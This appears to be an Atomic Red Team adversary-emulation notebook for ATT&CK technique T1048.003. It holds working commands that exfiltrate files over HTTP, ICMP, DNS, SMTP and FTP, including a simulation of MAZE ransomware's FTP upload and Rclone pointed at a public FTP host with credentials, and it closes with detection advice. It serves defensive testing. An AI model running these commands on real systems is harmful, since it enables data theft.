# T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 

Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. 

## Atomic Tests

### Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.

**Supported Platforms:** macos, linux
Run it with these steps!
1. Victim System Configuration:

    mkdir /tmp/victim-staging-area
    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area
    python -m SimpleHTTPServer 1337

3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt


### Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol.

Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\Windows\System32\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send("127.0.0.1", 1500, $Data) }
```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 2

### Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.

**Supported Platforms:** linux
Run it with these steps!
1. On the adversary machine run the below command.

    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt

2. On the victim machine run the below commands.

    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
    
3. Once the data is received, use the below command to recover the data.

    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r


### Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$content = Get-Content C:\Windows\System32\notepad.exe
Invoke-WebRequest -Uri http://127.0.0.1 -Method POST -Body $content
```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 4

### Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP
Exfiltration of specified file over SMTP.
Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout.

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
Send-MailMessage -From test@corp.com -To test@corp.com -Subject "T1048.003 Atomic Test" -Attachments C:\Windows\System32\notepad.exe -SmtpServer 127.0.0.1
```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 5

### Atomic Test #6 - MAZE FTP Upload
This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. 
Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents

**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
$Dir_to_copy = "$env:windir\temp"
$ftp = "ftp://127.0.0.1/"
$web_client = New-Object System.Net.WebClient
$web_client.Credentials = New-Object System.Net.NetworkCredential('None', 'None')
if (test-connection -count 1 -computername "127.0.0.1" -quiet)
{foreach($file in (dir $Dir_to_copy "*.7z"))
{echo "Uploading $file..."
$uri = New-Object System.Uri($ftp+$file.name)
$web_client.UploadFile($uri, $file.FullName)}}
else
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 6

### Atomic Test #7 - Exfiltration Over Alternative Protocol - FTP - Rclone
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Check if the exfil package exists

##### Check Prereq Commands:
```powershell
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760

```
##### Description: Check if rclone zip exists
##### Check Prereq Commands:
```powershell
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\

```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
&$rclone_bin config create ftpserver "ftp" "host" ftp.dlptest.com "port" 21 "user" dlpuser "pass" rNrKYTX9g7z3RgJRmxWuGHbeu
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 7

### Atomic Test #8 - Python3 http.server
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.

**Supported Platforms:** linux
#### Attack Commands: Run with `sh`
```sh
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
```

In [ ]:
Invoke-AtomicTest T1048.003 -TestNumbers 8

## Detection
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) 